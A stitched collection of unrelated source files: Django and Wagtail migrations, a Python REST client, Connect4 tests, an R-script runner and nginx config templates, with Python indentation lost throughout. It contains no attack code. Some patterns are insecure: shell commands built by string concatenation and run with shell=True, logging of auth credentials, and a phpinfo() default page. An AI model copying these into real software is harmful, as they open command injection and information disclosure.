field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dataset_metadata_relations', related_query_name='dataset_metadata_relation', to='registry.layer'),
),
migrations.AddField(
model_name='datasetmetadataconformitycheckrun',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='datasetmetadataconformitycheckrun',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='the dataset metadata targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.datasetmetadata', verbose_name='dataset metadata'),
),
migrations.AddField(
model_name='datasetmetadata',
name='dataset_contact',
field=models.ForeignKey(help_text='this is the contact which provides this dataset.', on_delete=django.db.models.deletion.RESTRICT, related_name='dataset_contact_metadata', related_query_name='dataset_contact_metadata', to='registry.metadatacontact', verbose_name='contact'),
),
migrations.AddField(
model_name='datasetmetadata',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='datasetmetadata_metadata', related_query_name='datasetmetadata_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='datasetmetadata',
name='licence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence'),
),
migrations.AddField(
model_name='datasetmetadata',
name='metadata_contact',
field=models.ForeignKey(help_text='this is the contact which is responsible for the metadata information of the dataset.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_metadata', related_query_name='metadata_contact_metadata', to='registry.metadatacontact', verbose_name='contact'),
),
migrations.AddField(
model_name='datasetmetadata',
name='reference_systems',
field=models.ManyToManyField(blank=True, related_name='dataset_metadata', related_query_name='dataset_metadata', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_catalouge_service',
field=models.ManyToManyField(blank=True, editable=False, help_text='all services from which this dataset was harvested.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.CatalougeService', verbose_name='services'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_feature_types',
            field=models.ManyToManyField(blank=True, editable=False, help_text='all feature types which link to this dataset metadata in their capabilities.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.FeatureType', verbose_name='feature types'),
),
migrations.AddField(
model_name='datasetmetadata',
name='self_pointing_layers',
            field=models.ManyToManyField(blank=True, editable=False, help_text='all layers which link to this dataset metadata in their capabilities.', related_name='dataset_metadata', related_query_name='dataset_metadata', through='registry.DatasetMetadataRelation', to='registry.Layer', verbose_name='layers'),
),
migrations.AddField(
model_name='catalougeserviceoperationurl',
name='mime_types',
field=models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='catalougeserviceoperationurl_operation_urls', related_query_name='catalougeserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type'),
),
migrations.AddField(
model_name='catalougeserviceoperationurl',
name='service',
            field=models.ForeignKey(editable=False, help_text='the catalogue service that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.catalougeservice', verbose_name='related catalogue service'),
),
migrations.AddField(
model_name='catalougeserviceauthentication',
name='service',
field=models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.catalougeservice', verbose_name='web feature service'),
),
migrations.AddField(
model_name='catalougeservice',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='catalougeservice_metadata', related_query_name='catalougeservice_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='catalougeservice',
name='licence',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.RESTRICT, to='registry.licence'),
),
migrations.AddField(
model_name='catalougeservice',
name='metadata_contact',
field=models.ForeignKey(help_text='This is the contact for the metadata information.', on_delete=django.db.models.deletion.RESTRICT, related_name='metadata_contact_catalougeservice_metadata', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='catalougeservice',
name='service_contact',
field=models.ForeignKey(help_text='This is the contact for the service provider.', on_delete=django.db.models.deletion.RESTRICT, related_name='service_contact_catalougeservice_metadata', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='analyzedresponselog',
name='response',
field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, related_name='analyzed_response', related_query_name='analyzed_response', to='registry.httpresponselog'),
),
migrations.AddField(
model_name='allowedoperationgrouprelation',
name='allowed_operation',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.allowedoperation'),
),
migrations.AddField(
model_name='allowedoperationgrouprelation',
name='service_access_group',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='registry.serviceaccessgroup'),
),
migrations.AddField(
model_name='allowedoperation',
name='allowed_groups',
field=models.ManyToManyField(related_name='allowed_operations', related_query_name='allowed_operation', through='registry.AllowedOperationGroupRelation', to='registry.ServiceAccessGroup'),
),
migrations.AddField(
model_name='allowedoperation',
name='operations',
field=models.ManyToManyField(related_name='allowed_operations', related_query_name='allowed_operation', to='registry.OGCOperation'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_feature_types',
field=models.ManyToManyField(help_text='Select one or more feature types.', related_name='allowed_operations', related_query_name='allowed_operation', to='registry.FeatureType', verbose_name='secured feature types'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_layers',
field=models.ManyToManyField(help_text='Select one or more layers. Note that all sub layers of a selected layer will also be secured.', related_name='allowed_operations', related_query_name='allowed_operation', to='registry.Layer', verbose_name='secured layers'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_wfs',
            field=models.ForeignKey(blank=True, help_text='the service of which some layers or feature types are secured.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='allowed_operations', related_query_name='allowed_operation', to='registry.webfeatureservice', verbose_name='secured service'),
),
migrations.AddField(
model_name='allowedoperation',
name='secured_wms',
            field=models.ForeignKey(blank=True, help_text='the service of which some layers or feature types are secured.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='allowed_operations', related_query_name='allowed_operation', to='registry.webmapservice', verbose_name='secured service'),
),
migrations.AddConstraint(
model_name='proxysetting',
constraint=models.CheckConstraint(check=models.Q(models.Q(('camouflage', True), ('log_response', True)), models.Q(('camouflage', True), ('log_response', False)), models.Q(('camouflage', False), ('log_response', False)), _connector='OR'), name='registry_proxysetting_log_response_without_camouflage'),
),
migrations.AddConstraint(
model_name='datasetmetadatarelation',
constraint=models.CheckConstraint(check=models.Q(models.Q(models.Q(('csw', False)), _negated=True)), name='registry_datasetmetadatarelation_one_related_object_selected'),
),
migrations.AddConstraint(
model_name='datasetmetadata',
constraint=models.UniqueConstraint(fields=('dataset_id', 'dataset_id_code_space'), name='registry_datasetmetadata_unique_together_dataset_id_dataset_id_code_space'),
),
migrations.AddField(
model_name='conformitycheckconfigurationinternal',
name='mandatory_rule_sets',
field=models.ManyToManyField(related_name='mandatory_rule_sets', to='registry.RuleSet'),
),
migrations.AddField(
model_name='conformitycheckconfigurationinternal',
name='optional_rule_sets',
field=models.ManyToManyField(blank=True, related_name='optional_rule_sets', to='registry.RuleSet'),
),
]
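The `proxysetting` check constraint above enumerates the three allowed combinations of `camouflage` and `log_response` as an OR of `Q` objects. As a sanity check, the same predicate collapses to a single boolean expression (a standalone sketch with an illustrative function name, not part of the migration):

```python
def proxy_setting_allowed(camouflage: bool, log_response: bool) -> bool:
    # Allowed combinations: (True, True), (True, False), (False, False).
    # Forbidden: log_response without camouflage, i.e. (False, True).
    return camouflage or not log_response
```

In other words, the constraint simply forbids logging responses while camouflage is disabled.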
# ---- src/fireorm/utils/__init__.py (jerber/FireORM, MIT) ----
from fireorm.utils.make_update_obj import make_update_obj
# ---- rester/http.py (skyarch-networks/Rester, MIT) ----
from logging import getLogger
from rester.struct import ResponseWrapper
import json
import requests
class HttpClient(object):
logger = getLogger(__name__)
ALLOWED_METHODS = ["get", "post", "put", "delete", "patch"]
def __init__(self, **kwargs):
self.extra_request_opts = kwargs
def request(self, api_url, method, headers, params, is_raw):
req_header = "{\n"
for key, value in headers.items():
req_header += (' {}: {}\n'.format(key, value))
req_header += " }"
self.logger.info(
'\n Invoking REST Call... \n api_url: %s,\n method: %s,\n headers: %s', api_url, method, req_header)
try:
func = getattr(requests, method)
except AttributeError:
self.logger.error('undefined HTTP method!!! %s', method)
raise
        # If params is a string containing valid JSON, send it as the request body (data)
if isinstance(params, str):
try:
json.loads(params)
data = params
params = None
except json.decoder.JSONDecodeError:
data = None
else:
data = None
response = func(api_url, headers=headers, params=params, data=data, **self.extra_request_opts)
if is_raw or 'json' not in response.headers['content-type']:
payload = {"__raw__": response.text}
else:
payload = response.json()
if response.status_code < 300:
emit = self.logger.debug
else:
            emit = self.logger.warning
        header = "Response Headers: \n{\n"
        for key, value in response.headers.items():
            header += (' {}: {}\n'.format(key, value))
        emit(header + "}")
if is_raw:
            emit('Response:\n%s\n', response.text)
print(response.text)
else:
emit('Response:\n' + json.dumps(payload, sort_keys=True, indent=2) + '\n')
print(json.dumps(payload, sort_keys=True, indent=2))
return ResponseWrapper(response.status_code, payload, response.headers)
# Add aws request
def aws_request(self, api_url, method, headers, params, auth, is_raw):
req_header = "{\n"
for key, value in headers.items():
req_header += (' {}: {}\n'.format(key, value))
req_header += " }"
self.logger.info(
            '\n Invoking REST Call... \n api_url: %s,\n method: %s,\n headers: %s,\n authorization: %s',
            api_url, method, req_header, auth)
try:
func = getattr(requests, method)
except AttributeError:
self.logger.error('undefined HTTP method!!! %s', method)
raise
        # If params is a string containing valid JSON, send it as the request body (data)
if isinstance(params, str):
try:
json.loads(params)
data = params
params = None
except json.decoder.JSONDecodeError:
data = params
params = None
else:
data = None
if isinstance(params, dict):
params_str = "&".join("%s=%s" % (k, v) for k, v in params.items())
response = func(api_url, headers=headers, params=params_str, data=data, auth=auth, **self.extra_request_opts)
else:
response = func(api_url, headers=headers, params=params, data=data, auth=auth, **self.extra_request_opts)
if is_raw or 'json' not in response.headers['content-type']:
payload = {"__raw__": response.text}
else:
payload = response.json()
if response.status_code < 300:
emit = self.logger.debug
else:
            emit = self.logger.warning
        header = "Response Headers: \n{\n"
        for key, value in response.headers.items():
            header += (' {}: {}\n'.format(key, value))
        emit(header + "}")
if is_raw:
            emit('Response:\n%s\n', response.text)
print(response.text)
else:
emit('Response:\n' + json.dumps(payload, sort_keys=True, indent=2) + '\n')
print(json.dumps(payload, sort_keys=True, indent=2))
return ResponseWrapper(response.status_code, payload, response.headers)
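The branching on `params` in `request` above (a string that parses as JSON is moved into the request body) can be isolated into a small helper. This is a hedged sketch of that same logic with an illustrative name, not part of the `HttpClient` API:

```python
import json

def split_params(params):
    """Return (query_params, body_data), mirroring HttpClient.request:
    a str that is valid JSON becomes the body; anything else stays as
    query parameters."""
    if isinstance(params, str):
        try:
            json.loads(params)
            return None, params
        except json.JSONDecodeError:
            return params, None
    return params, None
```

For example, `split_params('{"a": 1}')` yields `(None, '{"a": 1}')`, while a dict or a non-JSON string is left as query parameters.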
# ---- tests/test_agents_common_evaluate_windows_in_row.py (InesVogel/Connect4, MIT) ----
from agents.common import PLAYER1, PLAYER2, initialize_game_state, apply_player_action, \
evaluate_windows_in_row, is_player_blocking_opponent
def test_evaluate_windows_in_row0_True_window0123():
game = initialize_game_state()
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER2)
apply_player_action(game, 2, PLAYER1)
apply_player_action(game, 3, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == True
def test_evaluate_windows_in_row0_False_window0123():
game = initialize_game_state()
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window1234():
game = initialize_game_state()
apply_player_action(game, 1, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER2)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window1234():
game = initialize_game_state()
apply_player_action(game, 1, PLAYER1)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window2345():
game = initialize_game_state()
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window2345():
game = initialize_game_state()
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_True_window3456():
game = initialize_game_state()
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row0_False_window3456():
game = initialize_game_state()
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, 0, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, 0, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window0123():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER2)
apply_player_action(game, 2, PLAYER1)
apply_player_action(game, 3, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == True
def test_evaluate_windows_in_row5_False_window0123():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 0, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(0, 4):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window1234():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 1, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER2)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window1234():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 1, PLAYER1)
for i in range(1, 5):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window2345():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 2, PLAYER2)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window2345():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
for i in range(2, 6):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_True_window3456():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 3, PLAYER2)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == True
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window3456():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in range(3, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
def test_evaluate_windows_in_row5_False_window3456_lastActionOutOfBounds():
game = initialize_game_state()
last_row = 5
for j in range(0, last_row):
for i in range(0, 7):
apply_player_action(game, i, PLAYER1)
apply_player_action(game, 4, PLAYER1)
apply_player_action(game, 5, PLAYER2)
apply_player_action(game, 6, PLAYER2)
for i in (-1, 7):
assert evaluate_windows_in_row(game, i, last_row, PLAYER1, is_player_blocking_opponent) == False
assert evaluate_windows_in_row(game, i, last_row, PLAYER2, is_player_blocking_opponent) == False
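Every test above walks four-cell horizontal windows across a board row. A minimal standalone sketch of that window extraction, assuming the usual 6x7 NumPy board returned by `initialize_game_state` (the helper name is illustrative and not part of `agents.common`):

```python
import numpy as np

def horizontal_windows(board: np.ndarray, row: int, length: int = 4):
    """Yield every contiguous window of `length` cells in `row`."""
    for start in range(board.shape[1] - length + 1):
        yield board[row, start:start + length]
```

On a 6x7 board this yields four windows per row (columns 0-3, 1-4, 2-5, 3-6), matching the ranges iterated in the tests.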
# ---- Browser/_apps/mail/main.py (iTecAI/BrowserHack, MIT) ----
def run(url):
return 'self.addTab(url="https://mail.google.com/mail/u/0/?view=cm&fs=1&tf=1&su=")'
# ---- src/avg_utils/luigi_avg_rtask_utils.py (Ask-Jennie/ask-jennie, BSD-2-Clause) ----
import subprocess
import pandas as pd
import os
import multiprocessing as mp
def generate_subprocess_call_for_a_analyte(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates the command to be passed to the subprocess module.
The command is created for a given analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
:returns: subprocess_call_for_r_script
"""
R_SCRIPT_PATH = "Rscript"
subprocess_call_for_r_script = str(
R_SCRIPT_PATH +
' "/usr/local/src/AvG_for_Terra.R" ' +
' "' + os.path.join(csv_ds_root_path, 'data_analyte_' + str(hashed_id) + '.csv') + '" ' +
' "' + str(params_file_path) + '" ' +
' "' + str(hashed_id) + '" ' +
' "' + str(output_dir) + '" ')
return subprocess_call_for_r_script
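`generate_subprocess_call_for_a_analyte` builds a shell command string by hand-quoting each argument. An alternative sketch that assembles the same invocation as an exec-style argument list, which `subprocess.call` can run with `shell=False` and no quoting pitfalls; this is an illustration with a hypothetical helper name, not a drop-in replacement:

```python
import os

def build_rscript_argv(hashed_id, csv_ds_root_path, params_file_path, output_dir):
    # Same arguments as the shell string above, as a list of argv entries.
    return [
        "Rscript",
        "/usr/local/src/AvG_for_Terra.R",
        os.path.join(csv_ds_root_path, "data_analyte_{}.csv".format(hashed_id)),
        params_file_path,
        str(hashed_id),
        output_dir,
    ]
```

The list form can be passed directly as `subprocess.call(argv)`, avoiding shell interpretation of paths that contain spaces or quotes.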
def run_r_script_for_an_analyte(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates a command and passes it to the subprocess module.
    The R script is run on the data for a single analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
"""
subprocess_call_for_r_script = generate_subprocess_call_for_a_analyte(
hashed_id, csv_ds_root_path, params_file_path, output_dir)
# print('subcall:' + subprocess_call_for_r_script)
subprocess.call(subprocess_call_for_r_script, shell=True)
def run_r_script_for_all_analytes(csv_ds_root_path, params_file_path, output_dir):
""" Run the avant-garde R script for all analytes. Reads the 'ID_Analyte_glossary' file, that contains all
hashed id values for all the analytes and iterates through it.
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file that is used as a _SUCCESS file
to be written in R to make sure that the script ran without errors.
"""
dd = [w.replace('data_analyte_', '') for w in os.listdir(csv_ds_root_path)]
dd = [w.replace('.csv', '') for w in dd]
dd = pd.DataFrame(dd, columns=['ID_Analyte'])
# dd['ID_Analyte'].map(lambda x: run_r_script_for_an_analyte(
# hashed_id=x,
# csv_ds_root_path=csv_ds_root_path,
# params_file_path=params_file_path,
# output_dir=output_dir))
pool = mp.Pool(mp.cpu_count())
num_analytes = len(dd['ID_Analyte'])
pool.starmap(run_r_script_for_an_analyte,
[(str(dd['ID_Analyte'][i]), csv_ds_root_path, params_file_path, output_dir) for i in range(num_analytes)])
# Below are the functions compatible with the Luigi pipeline
def generate_subprocess_call_for_a_analyte_luigi(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates the command to be passed to the subprocess module.
The command is created for a given analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
:returns: subprocess_call_for_r_script
"""
R_SCRIPT_PATH = os.getenv('R_SCRIPT_PATH')
local_path = os.getenv('local_path')
subprocess_call_for_r_script = str(
R_SCRIPT_PATH +
' "' + local_path + 'src/AvG_R_scripts/AvG_from_partitionedParquet.R' + '" ' +
' "' + local_path + csv_ds_root_path + 'data_analyte_' + str(hashed_id) + '.csv' + '" ' +
' "' + str(params_file_path) + '" ' +
' "' + str(hashed_id) + '" ' +
' "' + local_path + output_dir + '" ')
return subprocess_call_for_r_script
def run_r_script_for_an_analyte_luigi(hashed_id, csv_ds_root_path, params_file_path, output_dir):
""" Generates a command and passes it to the subprocess module.
    The R script is run on the data for a single analyte.
:param str hashed_id: hashed id of the analyte
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed ids and it is used as the _SUCCESS file
"""
subprocess_call_for_r_script = generate_subprocess_call_for_a_analyte_luigi(
hashed_id, csv_ds_root_path, params_file_path, output_dir)
# print('subcall:' + subprocess_call_for_r_script)
subprocess.call(subprocess_call_for_r_script, shell=True)
def run_r_script_for_all_analytes_luigi(id_analyte_path,csv_ds_root_path, params_file_path, output_dir):
""" Run the avant-garde R script for all analytes. Reads the 'ID_Analyte_glossary' file, that contains all
hashed id values for all the analytes and iterates through it.
:param str id_analyte_path: output path of the 'ID_Analyte_glossary' file. This file contains the values of all
hashed id values.
:param str csv_ds_root_path: path to the folder of temporary csv files
:param str params_file_path: path to the parameters file for the R script
:param str output_dir: output path of the 'ID_Analyte_glossary' file that is used as a _SUCCESS file
to be written in R to make sure that the script ran without errors.
"""
dd = pd.read_csv(id_analyte_path)
pool = mp.Pool(mp.cpu_count())
num_analytes = len(dd['ID_Analyte'])
pool.starmap(run_r_script_for_an_analyte_luigi,
[(str(dd['ID_Analyte'][i]), csv_ds_root_path, params_file_path, output_dir) for i in range(num_analytes)])
# ---- jennie/ubuntu/nginxfiles.py (Ask-Jennie/ask-jennie, MIT) ----
NGINX_PORT_CONF = '''server {
listen PORT;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
NGINX_HTTP_CONF = '''server {
listen 80;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
NGINX_HTTPS_CONF = '''server {
listen 443;
index index.html index.htm index.nginx-debian.html index.php;
server_name DOMAIN;
ssl on;
ssl_certificate /etc/letsencrypt/live/DOMAIN_NAME/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/DOMAIN_NAME/privkey.pem;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''
DEFAULT_CONF = '''server {
listen 80;
root /var/www/html;
index index.html index.htm index.nginx-debian.html index.php;
server_name localhost;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
}'''
DEFAULT_PHPMYADMIN_CONF = r'''server {
listen 80;
root /var/www/html;
index index.php index.html index.htm index.nginx-debian.html;
server_name localhost;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/var/run/php/php7.2-fpm.sock;
}
}'''
KIBANA_CONF = '''server {
listen 8100;
server_name kibana;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}'''
DJANGO_HTTPS_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen 443 ssl;
listen [::]:443 ssl;
server_name DOMAIN_NAME;
ssl_certificate /etc/letsencrypt/live/DOMAIN_NAME/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/DOMAIN_NAME/privkey.pem;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DJANGO_HTTP_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen 80;
listen [::]:80;
server_name DOMAIN_NAME;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DJANGO_PORT_CONF = '''upstream backend {
server 127.0.0.1:PORT_EXCHANGE; # for a web port socket
}
server {
listen PORT;
listen [::]:PORT;
server_name DOMAIN_NAME;
charset utf-8;
#Max upload size
client_max_body_size 75M; # adjust to taste
# Finally, send all non-media requests to the Django server.
location / {
uwsgi_pass backend;
include /etc/nginx/uwsgi_params;
}
}'''
DEFAULT_PHP_PAGE = '''<?php
// Show all information, defaults to INFO_ALL
phpinfo();
?>
'''
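The templates above use ALL-CAPS placeholder tokens (`PORT`, `DOMAIN`, `ROOT`, `DOMAIN_NAME`, `PORT_EXCHANGE`). A minimal sketch of how such a template might be rendered — `render_conf` is a hypothetical helper, not part of the original module; note that longer tokens must be substituted first so that `DOMAIN_NAME` is not clobbered by a `DOMAIN` replacement:

```python
# Hypothetical helper (not in the original module): substitute the
# ALL-CAPS placeholder tokens of an nginx config template.
NGINX_PORT_CONF = '''server {
listen PORT;
server_name DOMAIN;
location / {
root ROOT;
try_files $uri $uri/ =404;
}
}'''

def render_conf(template, **placeholders):
    """Replace placeholder tokens (PORT, DOMAIN, ROOT, ...) in a template.

    Longer keys are replaced first so DOMAIN_NAME wins over DOMAIN.
    """
    for key in sorted(placeholders, key=len, reverse=True):
        template = template.replace(key, str(placeholders[key]))
    return template

conf = render_conf(NGINX_PORT_CONF, PORT=8080, DOMAIN="example.com", ROOT="/var/www/app")
```

The rendered string would then typically be written under `/etc/nginx/sites-available/` and symlinked into `sites-enabled/`.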
44f672b2b8ba9e350cbdca01844685f64c772898 | 1,737 | py | Python | joplin/pages/event_page/migrations/0005_auto_20201102_2138.py | cityofaustin/joplin | 01424e46993e9b1c8e57391d6b7d9448f31d596b | ["MIT"] | 15 | 2018-09-27T07:36:30.000Z | 2021-08-03T16:01:21.000Z
# Generated by Django 2.2.16 on 2020-11-02 21:38
from django.db import migrations
import wagtail.core.fields
class Migration(migrations.Migration):
dependencies = [
